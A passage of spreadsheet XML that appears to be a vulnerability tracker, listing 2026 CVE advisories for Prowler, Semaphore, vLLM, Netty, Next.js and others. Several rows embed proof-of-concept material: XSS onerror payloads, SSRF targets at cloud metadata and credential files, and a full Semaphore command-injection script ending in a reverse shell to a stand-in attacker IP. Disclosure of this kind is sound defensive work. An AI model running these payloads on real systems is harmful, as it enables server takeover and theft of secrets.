        "2002:7f00:0001::1",    // 6to4 -&gt; 127.0.0.1
        "64:ff9b::a9fe:a9fe",   // NAT64 -&gt; 169.254.169.254
        "2002:a9fe:a9fe::1",    // 6to4 -&gt; 169.254.169.254
    } {
        ip := net.ParseIP(v)
        fmt.Printf("%-35s blocked=%v\n", v, isBlockedIP(ip))
    }
}
// Output: all false
```

## Remediation

Add IPv6 transition mechanism prefix checks to `isBlockedIP`:

```go
func isBlockedIP(ip net.IP) bool {
	// ... existing checks ...

	// IPv6 transition mechanisms embedding arbitrary IPv4
	if len(ip) == net.IPv6len {
		if ip[0] == 0x20 &amp;&amp; ip[1] == 0x02 { return true } // 6to4
		if ip[0] == 0x00 &amp;&amp; ip[1] == 0x64 &amp;&amp; ip[2] == 0xff &amp;&amp; ip[3] == 0x9b { return true } // NAT64
		if ip[0] == 0x20 &amp;&amp; ip[1] == 0x01 &amp;&amp; ip[2] == 0x00 &amp;&amp; ip[3] == 0x00 { return true } // Teredo
	}
	return false
}
```

## Credit

Reported by tonghuaroot (tonghuaroot@gmail.com).</t></is></c><c r="T22" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73087</t></is></c></row><row r="23"><c r="A23" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B23" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C23" s="5" t="inlineStr"><is><t>CVE-2026-73262</t></is></c><c r="D23" s="5" t="inlineStr" /><c r="E23" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F23" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G23" s="5" t="inlineStr" /><c r="H23" s="5" t="n"><v>0.002</v></c><c r="I23" s="5" t="inlineStr" /><c r="J23" s="5" t="inlineStr" /><c r="K23" s="5" t="inlineStr" /><c r="L23" s="5" t="inlineStr"><is><t>PyPI:prowler, PyPI:prowler-cloud</t></is></c><c r="M23" s="5" t="inlineStr"><is><t>5.37.0</t></is></c><c r="N23" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O23" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P23" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q23" s="5" t="inlineStr" /><c r="R23" s="5" t="inlineStr" /><c r="S23" s="5" t="inlineStr"><is><t>## Summary

Prowler's HTML output formatter inserts `finding.resource_tags` into the generated report without HTML escaping. A cloud principal who can create or edit a resource tag in an account that is later scanned can store HTML or JavaScript in that tag. When another user opens the generated Prowler HTML report, the payload executes in the report page.

## Impact

This is stored cross-site scripting in a security report artifact. The attacker needs permission to influence tags on a scanned cloud resource, and the victim must open the generated HTML report. In that context, JavaScript can read and modify the report DOM, alter displayed findings, and interact with any same-origin local or hosted report content available to the browser. This can undermine trust in generated security findings and can expose data contained in the report page.

## Gate checks

The repository has 13,875 GitHub stars, which is above the 10,000 star floor. `SECURITY.md` is present and does not reject GitHub private reporting. The dedicated GitHub private vulnerability reporting endpoint for `prowler-cloud/prowler` returned `true`.

## Affected versions

The vulnerable sink is present in current `master` at commit `329dfdf8e6cb8bc0424fb54b6595408e20969782` and in the latest GitHub release tag `5.28.0`. The package metadata identifies the Python package as `prowler`.

## Technical details

The HTML formatter builds each finding row with an f-string in `prowler/lib/outputs/html/html.py`. Neighboring fields are explicitly escaped:

- `resource_uid` is escaped at line 85 with `.replace("&lt;", "&amp;lt;").replace("&gt;", "&amp;gt;")`.
- `status_extended` is escaped at line 87 with the same pattern.

The tag column does not apply equivalent escaping:

```python
&lt;td&gt;{parse_html_string(unroll_dict(finding.resource_tags))}&lt;/td&gt;
```

`unroll_dict` concatenates tag keys and values into a string, and `parse_html_string` only prefixes each item with an HTML bullet. Neither function escapes `&lt;`, `&gt;`, quotes, or event-handler attributes before insertion into the table cell. As a result, a tag value such as this remains active markup in the generated report:

```html
&lt;img src=x onerror="window.PROWLER_TAG_XSS=1"&gt;
```

## Reproduction

1. Create or identify a cloud resource that Prowler will include in an HTML report.
2. Add a tag value containing a harmless proof payload, for example:

```html
&lt;img src=x onerror="window.PROWLER_TAG_XSS=1"&gt;
```

3. Run Prowler against the account and generate HTML output.
4. Open the generated HTML report in a browser.
5. The payload executes from the tags column.

A proof HTML fragment using the same formatter structure set `window.PROWLER_TAG_XSS=1` from `resource_tags`, while equivalent payloads in `resource_uid` and `status_extended` stayed text because those fields are escaped.

Local evidence:

- `/home/unkn0wn/security_audit/vulnerability-reports/prowler-html-tag-xss-evidence-2026-05-26.json`
- `/home/unkn0wn/security_audit/vulnerability-reports/prowler-html-tag-xss-proof-full.html`

## PoC

The minimized generated row below mirrors the vulnerable formatter output. The first and third candidate payloads are escaped controls. The middle payload is the unescaped `resource_tags` value and executes when the report is rendered.

```html
&lt;tr class="table-danger"&gt;
  &lt;td&gt;&amp;lt;img src=x onerror="window.PROWLER_UID_XSS=1"&amp;gt;&lt;/td&gt;
  &lt;td&gt;
    &amp;#x2022;Owner=&lt;img src=x onerror="window.PROWLER_TAG_XSS=1;document.body.setAttribute('data-prowler-tag-xss','1')"&gt;
  &lt;/td&gt;
  &lt;td&gt;&amp;lt;img src=x onerror="window.PROWLER_STATUS_XSS=1"&amp;gt;&lt;/td&gt;
&lt;/tr&gt;
```

Browser proof result from the local artifact:

```json
{"tag": 1, "uid": 0, "status": 0, "attr": "1"}
```

## Remediation

Escape tag keys and values before inserting them into HTML output. Prefer a single HTML escaping helper for every finding field that can originate from provider data. If bullets or separators are needed, build the list structure after escaping each key and value, rather than escaping the final HTML string after markup has been added.</t></is></c><c r="T23" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73262</t></is></c></row><row r="24"><c r="A24" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B24" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C24" s="5" t="inlineStr"><is><t>CVE-2026-73294</t></is></c><c r="D24" s="5" t="inlineStr" /><c r="E24" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F24" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G24" s="5" t="inlineStr" /><c r="H24" s="5" t="n"><v>0.006</v></c><c r="I24" s="5" t="inlineStr" /><c r="J24" s="5" t="inlineStr" /><c r="K24" s="5" t="inlineStr" /><c r="L24" s="5" t="inlineStr"><is><t>Go:github.com/semaphoreui/semaphore</t></is></c><c r="M24" s="5" t="inlineStr"><is><t>0.0.0-20260704181911-7e8a9434bd81</t></is></c><c r="N24" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O24" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P24" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q24" s="5" t="inlineStr" /><c r="R24" s="5" t="inlineStr" /><c r="S24" s="5" t="inlineStr"><is><t># Summary
An OS command injection in repository git_url handling lets any user holding the Manager or Owner role on any project (the normal project-collaborator roles) achieve remote code execution on the Semaphore server host. Using git's --upload-pack=&lt;cmd&gt; option, an attacker runs arbitrary commands. The command executes inside the main Semaphore server process (via the schedule commit-hash poller), so it runs even when jobs are configured for remote runners — bypassing runner isolation and exposing the master encryption key and every project's secrets. Reproducible on a default install (git_client: cmd_git); no non-default configuration is required.

# Details
The repository git_url is attacker-controlled (HTTP body) and reaches exec.Command("git", ...) unvalidated. Two missing controls cause this:

1. git_url is never validated against option injection.
Repository.Validate() (db/Repository.go, ~lines 138–156) validates the branch via ValidateGitBranch (db/git_branch.go, which rejects a leading -), but performs no equivalent check on GitURL (only "non-empty"). ValidateRepository (db/Store.go, ~802–806) only checks the SSH key. CreateRepository (db/sql/repository.go, ~76–95) stores it verbatim. Because --upload-pack=... has no scheme:// and no leading /, GetType() (db/Repository.go, ~113–136) classifies it as RepositorySSH and GetGitURL(false) (~72–111) returns it raw/unchanged.

2. The git command is built with no -- separator.
CmdGitClient.GetLastRemoteCommitHash (db_lib/CmdGitClient.go, ~169–185) calls:
c.output(r, GitRepositoryTmpPath, "ls-remote",
           r.Repository.GetGitURL(false),   // attacker-controlled
           r.Repository.GitBranch)          // "master"
output (~79–93) → makeCmd (~21–60): exec.Command("git") (line ~27), cmd.Args = append(cmd.Args, args...) (line ~55). The resulting argv has no --:
["git", "ls-remote", "--upload-pack=&lt;cmd&gt;;true", "master"]
git parses --upload-pack=... as an option; master becomes the (local-transport) repository operand; git then executes the upload-pack value through a shell (sh -c "&lt;cmd&gt; 'master'"), running &lt;cmd&gt;. This is intended git behavior — the fault is Semaphore passing untrusted data as argv. (The command runs even though git subsequently prints fatal: Could not read from remote repository and exits 128, and even though master is not a real path.)

### Trigger — it fires in the server process.
A project schedule with a repository_id causes the scheduler to run git ls-remote to check for new commits. AddSchedule (api/projects/schedules.go, ~130–160; validateSchedulePayload ~86–118 validates only the cron format — it does not require the repo to be tied to the template). The schedule pool is started in the server process: runService in cli/cmd/root.go (CreateSchedulePool ~line 115, go schedulePool.Run() ~line 193), independent of remote-runner config. On each tick, ScheduleRunner.Run (services/schedules/SchedulePool.go, ~96–193, line ~117) calls tryUpdateScheduleCommitHash (~61–94) — before the HA de-dup lock (~145) — which loads the repo by repository_id and calls GetLastRemoteCommitHash(). Refresh (~265–358, line 287) registers such schedules even when inactive, so deactivating does not stop it.

### Entry points:
POST /api/project/{id}/repositories (api/projects/repository.go:AddRepository, ~101–137) stores the payload; POST /api/project/{id}/schedules arms it. Both are gated by GetMustCanMiddleware(db.CanManageProjectResources) (api/router.go ~294/310/327), a permission held by ProjectManager/ProjectOwner (db/ProjectUser.go, ~22–27).

# PoC
Environment: the official semaphore v2.18.12 binary; git, python3, nc present. This PoC uses the default git client and non_admin_can_create_project: false; the attacker lowpriv is onboarded by the admin as a normal Manager (no special configuration).

### Terminal 1 — config + users + server
```
  cd ~/PoC &amp;&amp; mkdir -p tmp
  cat &gt; config.json &lt;&lt;EOF
  { "sqlite":{"host":"$PWD/database.sqlite"},"dialect":"sqlite","tmp_path":"$PWD/tmp",
    "port":":3000","interface":"127.0.0.1",
    "cookie_hash":"$(head -c32 /dev/urandom|base64)","cookie_encryption":"$(head -c32 /dev/urandom|base64)",
    "access_key_encryption":"$(head -c32 /dev/urandom|base64)","git_client":"cmd_git",
    "non_admin_can_create_project":false,"web_host":"http://127.0.0.1:3000/" }
  EOF
  ./semaphore user add --admin --login admin  --name Admin --email admin@example.com --password 'Admin123!'  --config config.json
  ./semaphore user add        --login lowpriv --name Low   --email low@example.com   --password 'LowPriv123!' --config config.json
  ./semaphore server --config config.json
```
### Terminal 2 — attacker listener
```
  nc -lvnp 4444
```
### Terminal 3 — admin onboards lowpriv as Manager, then lowpriv exploits
```
  cd ~/PoC

  cat &gt; onboard.sh &lt;&lt;'EOF'
  #!/usr/bin/env bash
  set -euo pipefail
  BASE="${BASE:-http://127.0.0.1:3000}"
  ADMIN="${ADMIN:-admin}"; ADMIN_PASS="${ADMIN_PASS:-Admin123!}"; MEMBER="${MEMBER:-lowpriv}"
  JAR=$(mktemp)
  curl -s -c "$JAR" -X POST "$BASE/api/auth/login" -H 'Content-Type: application/json' \
    -d "{\"auth\":\"$ADMIN\",\"password\":\"$ADMIN_PASS\"}" &gt;/dev/null
  PROJ_PID=$(curl -s -b "$JAR" -X POST "$BASE/api/projects" -H 'Content-Type: application/json' \
    -d '{"name":"team-project","alert":false}' | python3 -c 'import sys,json;print(json.load(sys.stdin)["id"])')
  USER_ID=$(curl -s -b "$JAR" "$BASE/api/users" | \
    python3 -c "import sys,json;print(next(u['id'] for u in json.load(sys.stdin) if u['username']=='$MEMBER'))")
  curl -s -b "$JAR" -X POST "$BASE/api/project/$PROJ_PID/users" -H 'Content-Type: application/json' \
    -d "{\"user_id\":$USER_ID,\"role\":\"manager\"}" -o /dev/null
  rm -f "$JAR"; echo "[*] $MEMBER is Manager of project $PROJ_PID" &gt;&amp;2; echo "$PROJ_PID"
  EOF
  chmod +x onboard.sh

  cat &gt; rce.sh &lt;&lt;'EOF'
  #!/usr/bin/env bash
  set -euo pipefail
  BASE="${BASE:-http://127.0.0.1:3000}"; LOGIN="${LOGIN:-lowpriv}"; PASS="${PASS:-LowPriv123!}"
  PROJ_PID="${PROJ_PID:?set PROJ_PID from onboard.sh}"
  CMD="$*"; B64=$(printf '%s' "$CMD" | base64 -w0)
  GITURL="--upload-pack=bash -c \"echo $B64 | base64 -d | bash\";true"
  JAR=$(mktemp); jid(){ python3 -c 'import sys,json;print(json.load(sys.stdin)["id"])'; }
  post(){ curl -s -b "$JAR" -X POST "$BASE$1" -H 'Content-Type: application/json' -d "$2"; }
  curl -s -c "$JAR" -X POST "$BASE/api/auth/login" -H 'Content-Type: application/json' \
    -d "{\"auth\":\"$LOGIN\",\"password\":\"$PASS\"}" &gt;/dev/null
  KID=$(post /api/project/$PROJ_PID/keys "{\"name\":\"k\",\"type\":\"none\",\"project_id\":$PROJ_PID}" | jid)
  BODY=$(python3 -c "import json,sys;print(json.dumps({'name':'r','project_id':$PROJ_PID,'git_url':sys.argv[1],'git_branch':'master','ssh_key_id':$KID}))" "$GITURL")
  RID=$(post /api/project/$PROJ_PID/repositories "$BODY" | jid)
  TID=$(post /api/project/$PROJ_PID/templates "{\"name\":\"t\",\"project_id\":$PROJ_PID,\"app\":\"bash\",\"playbook\":\"n.sh\",\"repository_id\":$RID,\"type\":\"\"}" | jid)
  post /api/project/$PROJ_PID/schedules "{\"name\":\"s\",\"project_id\":$PROJ_PID,\"template_id\":$TID,\"repository_id\":$RID,\"cron_format\":\"* * * * *\"}" &gt;/dev/null
  rm -f "$JAR"; echo "[*] queued as lowpriv (Manager of $PROJ_PID): $CMD"
  EOF
  chmod +x rce.sh

  PROJ_PID=$(./onboard.sh)
  ATTACKER_IP=127.0.0.1
  PROJ_PID=$PROJ_PID ./rce.sh "bash -i &gt;&amp; /dev/tcp/$ATTACKER_IP/4444 0&gt;&amp;1"
```

Within ~60 s the schedule fires and the Semaphore server process connects back to the listener (Terminal 2), giving an interactive shell as the server user. Verify with id and cat ~/PoC/config.json (the server can read its own access_key_encryption master key).

# Impact
- Type: OS command injection via argument injection — remote code execution.
- Who is impacted: any Semaphore deployment running the default git_client: cmd_git. The attacker only needs an authenticated account holding the Manager or Owner role on any project — the standard collaborator roles. (If non_admin_can_create_project is enabled, literally any authenticated user qualifies, since they can self-create a project and become its Owner. Global admins always qualify.)</t></is></c><c r="T24" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73294</t></is></c></row><row r="25"><c r="A25" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B25" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C25" s="5" t="inlineStr"><is><t>CVE-2026-73558</t></is></c><c r="D25" s="5" t="inlineStr" /><c r="E25" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F25" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G25" s="5" t="inlineStr" /><c r="H25" s="5" t="n"><v>0.003</v></c><c r="I25" s="5" t="inlineStr" /><c r="J25" s="5" t="inlineStr" /><c r="K25" s="5" t="inlineStr" /><c r="L25" s="5" t="inlineStr"><is><t>PyPI:vllm</t></is></c><c r="M25" s="5" t="inlineStr"><is><t>0.27.0</t></is></c><c r="N25" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O25" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P25" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q25" s="5" t="inlineStr" /><c r="R25" s="5" t="inlineStr" /><c r="S25" s="5" t="inlineStr"><is><t>###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vulnerability and is straightforward to trigger.
### PoC
We reproduced the issue using meta-llama/Llama-3.2-1B-Instruct, for which d = 8192.

Using the following configuration:

Batch size: 17
Sequence length: 16384

The final response in the batch becomes an exact copy of the first response in the batch, demonstrating complete cross-user data leakage.

### Impact
This vulnerability enables cross-user information disclosure. An attacker can intentionally craft requests that are processed within the same inference batch as a victim's request and cause the victim's inference output to be copied into the attacker's response.

As a result, sensitive information contained in another user's model response may be exposed to an unauthorized party.

### Versions

For versions prior and equal to 0.21.0, the bug is in csrc/activation_kernels.cu, and for versions later than 0.21.0, the bug is in csrc/libtorch_stable/activation_kernels.cu.</t></is></c><c r="T25" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73558</t></is></c></row><row r="26"><c r="A26" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B26" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C26" s="5" t="inlineStr"><is><t>CVE-2026-73560</t></is></c><c r="D26" s="5" t="inlineStr" /><c r="E26" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F26" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G26" s="5" t="inlineStr" /><c r="H26" s="5" t="n"><v>0.003</v></c><c r="I26" s="5" t="inlineStr" /><c r="J26" s="5" t="inlineStr" /><c r="K26" s="5" t="inlineStr" /><c r="L26" s="5" t="inlineStr"><is><t>PyPI:vllm</t></is></c><c r="M26" s="5" t="inlineStr"><is><t>0.26.0</t></is></c><c r="N26" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O26" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P26" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q26" s="5" t="inlineStr" /><c r="R26" s="5" t="inlineStr" /><c r="S26" s="5" t="inlineStr"><is><t>###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**File:** `vllm/transformers_utils/processors/mimo_v2_omni.py` (current `main`)

**Sink 1 — image SSRF + local-file read (`_fetch_image`, lines 231–249):**

```python
def _fetch_image(src: Any) -&gt; Image.Image:
    if isinstance(src, Image.Image):
        return _to_rgb(src)
    if isinstance(src, bytes):
        return _to_rgb(copy.deepcopy(Image.open(BytesIO(src))))
    if isinstance(src, str):
        if src.startswith(("http://", "https://")):
            r = requests.get(src, timeout=30)              # SSRF: no allowlist, follows redirects
            r.raise_for_status()
            return _to_rgb(copy.deepcopy(Image.open(BytesIO(r.content))))
        if src.startswith("file://"):
            return _to_rgb(Image.open(src[7:]))            # arbitrary local file read
        if src.startswith("data:image"):
            ...
        return _to_rgb(Image.open(src))                    # fallback also opens local files
    raise ValueError(f"Unrecognized image source: {type(src)}")
```

**Sink 2 — audio SSRF (around line 471):**

```python
elif audio.startswith(("http://", "https://")):
    r = requests.get(audio, timeout=30)                    # SSRF: same pattern
    r.raise_for_status()
    file_obj = io.BytesIO(r.content)
```

**Reachability.** `_fetch_image` is invoked from `MiMoVLProcessor.process_image`:

```python
def process_image(self, image: ImageInput) -&gt; torch.Tensor:
    kw = self._resolve_img_kw(image)
    src = image.image
    if isinstance(src, (str, bytes)):
        src = _fetch_image(src)
    ...
```

`MiMoVLProcessor` is wrapped by `MiMoV2OmniMultiModalProcessor` and registered for the `MiMoV2OmniForCausalLM` model architecture (`vllm/model_executor/models/mimo_v2_omni.py:1169`). Whenever a user passes a string into `multi_modal_data["image"]` (or `["audio"]`) for this model, the unsanitized URL/path reaches the sink.

**Comparison to the recent fixes.** The remediation pattern adopted in the three earlier advisories was to route every external resource fetch through `MediaConnector`, which checks `allowed_local_media_path` and applies SSRF protection before issuing the network request. `chat_utils.py` (lines 838, 902, 924, 963, 1053, 1081) already uses `self._connector.fetch_image / fetch_audio / fetch_video`. The model processor in `mimo_v2_omni.py` was added later and skipped the connector — it calls `requests.get` and `Image.open` directly. Result: the public OpenAI chat-completion path is protected, but library use (`LLM.generate(multi_modal_data=...)`), batch processing, and any other path that lets a string reach the processor receive no protection.

### Impact

1. **SSRF — internal-network probing / cloud-metadata theft.** Standard `requests.get` follows redirects and accepts any URL. An attacker who controls a `multi_modal_data` value can:
   - read AWS / GCP / Azure instance metadata (e.g. `http://169.254.169.254/latest/meta-data/iam/security-credentials/`),
   - probe internal services on the vLLM host (`http://127.0.0.1:&lt;port&gt;`, `http://10.x.y.z`),
   - exfiltrate via DNS / HTTP timing oracles even when the body is rejected by `Image.open`.
2. **Arbitrary local file read** via `file://path` (line 242) and the unguarded fallback `Image.open(src)` (line 248). Any file readable by the vLLM process is reachable through the model pipeline; with suitable formats this exposes `/etc/passwd`, `~/.aws/credentials`, etc.
3. **Server-side traffic generation / amplification** by hammering arbitrary URLs from the vLLM host, with a 30-second timeout per request.

### Suggested remediation

Replace direct `requests.get` and bare `Image.open` paths with `MediaConnector.fetch_image` / `fetch_audio_async` (or pass the inputs through `MediaConnector` before they reach the processor):

```python
# vllm/transformers_utils/processors/mimo_v2_omni.py
from vllm.multimodal.utils import MediaConnector

_connector = MediaConnector()

def _fetch_image(src):
    if isinstance(src, Image.Image):
        return _to_rgb(src)
    if isinstance(src, bytes):
        return _to_rgb(copy.deepcopy(Image.open(BytesIO(src))))
    if isinstance(src, str):
        return _to_rgb(_connector.fetch_image(src))   # delegates to the hardened path
    raise ValueError(f"Unrecognized image source: {type(src)}")
```

Same change for the audio loader at line 471. This re-uses the SSRF allowlist, `allowed_local_media_path` policy, and size caps that the previous patches added.

Alternative: forbid `str` `src` from reaching the processor and require all multi-modal pre-processing to go through `chat_utils.py` / `MediaConnector` before hitting the model. Larger surface change, but completes the architectural fix.

### Discovery

Static review on `vllm@main` (HEAD as of 2026-04-30) — found by triaging the file list against the three recent SSRF advisories: the `mimo_v2_omni.py` processor, added after those fixes, reintroduced the same bypass class.

### Reporter

Ievgen Bondarenko — `sactransport2000@gmail.com` — GitHub `@ibondarenko1`</t></is></c><c r="T26" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73560</t></is></c></row><row r="27"><c r="A27" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B27" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C27" s="5" t="inlineStr"><is><t>CVE-2026-75595</t></is></c><c r="D27" s="5" t="inlineStr" /><c r="E27" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F27" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G27" s="5" t="inlineStr" /><c r="H27" s="5" t="n"><v>0.003</v></c><c r="I27" s="5" t="inlineStr" /><c r="J27" s="5" t="inlineStr" /><c r="K27" s="5" t="inlineStr" /><c r="L27" s="5" t="inlineStr"><is><t>Maven:io.netty:netty-handler</t></is></c><c r="M27" s="5" t="inlineStr"><is><t>4.1.137.Final, 4.2.17.Final</t></is></c><c r="N27" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O27" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P27" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q27" s="5" t="inlineStr" /><c r="R27" s="5" t="inlineStr" /><c r="S27" s="5" t="inlineStr"><is><t>### Summary
A fragmented TLS ClientHello whose handshake header spans multiple records makes Netty silently fall back to the default SslContext; where per-SNI selection is the sole mTLS gate, an unauthenticated attacker can bypass the route's mTLS requirement.

### Details
In `io.netty.handler.ssl.SslClientHelloHandler#decode` the guard that should wait for the 4-byte handshake header checks the wrong offset - it ignores the 5-byte record header that precedes it - and therefore never fires:

```java
if (handshakeLength == -1) {
    if (readerIndex + 4 &gt; endOffset) {
        // Need more data to read HandshakeType and handshakeLength (4 bytes)
        return;
    }
```

When the first record's payload is &lt; 4 bytes, `handshakeLength = in.getUnsignedMedium(readerIndex + SslUtils.SSL_RECORD_HEADER_LENGTH + 1);` leads to `IndexOutOfBoundsException `. That is caught by the generic `catch (Exception)` block, which calls `select(ctx, null)` - this is the default `SslContext`. Fallback to default on parse failure is a problem when per-SNI selection is the sole mTLS gate.

### Impact
SNI routing bypass. Escalates to an unauthenticated mTLS bypass only when:
- mTLS is enforced solely via per-SNI SslContext (clientAuth=REQUIRE)
- the default/fallback SslContext is permissive (clientAuth=NONE/OPTIONAL)
- no secondary peer-certificate verification exists at the application layer.</t></is></c><c r="T27" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75595</t></is></c></row><row r="28"><c r="A28" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B28" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C28" s="5" t="inlineStr"><is><t>CVE-2026-75596</t></is></c><c r="D28" s="5" t="inlineStr" /><c r="E28" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F28" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G28" s="5" t="inlineStr" /><c r="H28" s="5" t="n"><v>0.004</v></c><c r="I28" s="5" t="inlineStr" /><c r="J28" s="5" t="inlineStr" /><c r="K28" s="5" t="inlineStr" /><c r="L28" s="5" t="inlineStr"><is><t>Maven:io.netty:netty-handler</t></is></c><c r="M28" s="5" t="inlineStr"><is><t>4.1.137.Final, 4.2.17.Final</t></is></c><c r="N28" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O28" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P28" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q28" s="5" t="inlineStr" /><c r="R28" s="5" t="inlineStr" /><c r="S28" s="5" t="inlineStr"><is><t>### Summary

Netty's default SNI entrypoint reparses and recopies previously received ClientHello fragments on every additional TLS handshake record. A remote peer can send a small first record that advertises a large ClientHello length and then drip the body in many tiny records, causing **superlinear (quadratic) CPU work** before the handshake completes. With 4095 one-byte fragments, the handler recopies **8,386,560 bytes** from only **24,579 bytes** on the wire — a **341× amplification** ratio.

### Affected Entrypoints

- `io.netty.handler.ssl.SniHandler` — default constructors
- `io.netty.handler.ssl.SslClientHelloHandler` — pre-handshake ClientHello aggregation path

### Vulnerable Code Locations

- `handler/src/main/java/io/netty/handler/ssl/SniHandler.java:85`
- `handler/src/main/java/io/netty/handler/ssl/SslClientHelloHandler.java:75` (decode entry)
- `handler/src/main/java/io/netty/handler/ssl/SslClientHelloHandler.java:165` (handshakeBuffer.clear)
- `handler/src/main/java/io/netty/handler/ssl/SslClientHelloHandler.java:174` (writeBytes re-copy)
- `codec-base/src/main/java/io/netty/handler/codec/ByteToMessageDecoder.java:294` (cumulation retention)

### Exploit Path

```
1. TCP connection → SniHandler → SslClientHelloHandler.decode
2. First record: TLS handshake header declaring large ClientHello length (e.g., 4096 bytes)
3. Attacker sends thousands of tiny follow-on handshake records (1 byte each)
4. On each fragment: handshakeBuffer.clear() + writeBytes() re-copies ALL accumulated body bytes
5. Total bytes copied = n*(n+1)/2 where n = number of body bytes → quadratic
6. Event-loop CPU exhausted before SslHandler takes over
```

### Impact

- **Vulnerability Type:** Inefficient Algorithmic Complexity
- An unauthenticated network attacker can drive disproportionate CPU consumption on the Netty event loop
- Affects **all** Netty deployments using `SniHandler` for TLS termination (the default SNI path)
- No privileges, user interaction, or special configuration required
- Can degrade or stall TLS connection handling for all clients on the affected event loop
- The attack requires only modest bandwidth (~25 KB) to trigger significant CPU work

---
### Credits

Found by a security research team from the University of Sydney, focusing on detecting open source software vulnerabilities.
Liyi Zhou: https://lzhou1110.github.io/
Ziyue Wang: https://zyy0530.github.io/
Strick: https://str1ckl4nd.github.io/
Maurice: https://maurice.busystar.org/
Chenchen Yu: https://7thparkk.github.io/</t></is></c><c r="T28" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75596</t></is></c></row><row r="29"><c r="A29" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B29" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C29" s="5" t="inlineStr"><is><t>CVE-2026-75604</t></is></c><c r="D29" s="5" t="inlineStr" /><c r="E29" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F29" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G29" s="5" t="inlineStr" /><c r="H29" s="5" t="n"><v>0.025</v></c><c r="I29" s="5" t="inlineStr" /><c r="J29" s="5" t="inlineStr" /><c r="K29" s="5" t="inlineStr" /><c r="L29" s="5" t="inlineStr"><is><t>npm:next</t></is></c><c r="M29" s="5" t="inlineStr"><is><t>15.5.24, 16.3.3</t></is></c><c r="N29" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O29" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P29" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q29" s="5" t="inlineStr" /><c r="R29" s="5" t="inlineStr" /><c r="S29" s="5" t="inlineStr"><is><t>## Impact

A vulnerability in applications using Pages and App router without Cache Component can lead to remote code execution when the server is hosted on machines using a Windows filesystem.

## Workaround

There is no known workaround for affected windows-hosted applications. You should upgrade immediately if your server is hosted on Windows.</t></is></c><c r="T29" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75604</t></is></c></row><row r="30"><c r="A30" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B30" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C30" s="5" t="inlineStr"><is><t>CVE-2026-77037</t></is></c><c r="D30" s="5" t="inlineStr" /><c r="E30" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F30" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G30" s="5" t="inlineStr" /><c r="H30" s="5" t="n"><v>0.003</v></c><c r="I30" s="5" t="inlineStr" /><c r="J30" s="5" t="inlineStr" /><c r="K30" s="5" t="inlineStr" /><c r="L30" s="5" t="inlineStr"><is><t>npm:multer</t></is></c><c r="M30" s="5" t="inlineStr"><is><t>2.3.0</t></is></c><c r="N30" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O30" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P30" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q30" s="5" t="inlineStr" /><c r="R30" s="5" t="inlineStr" /><c 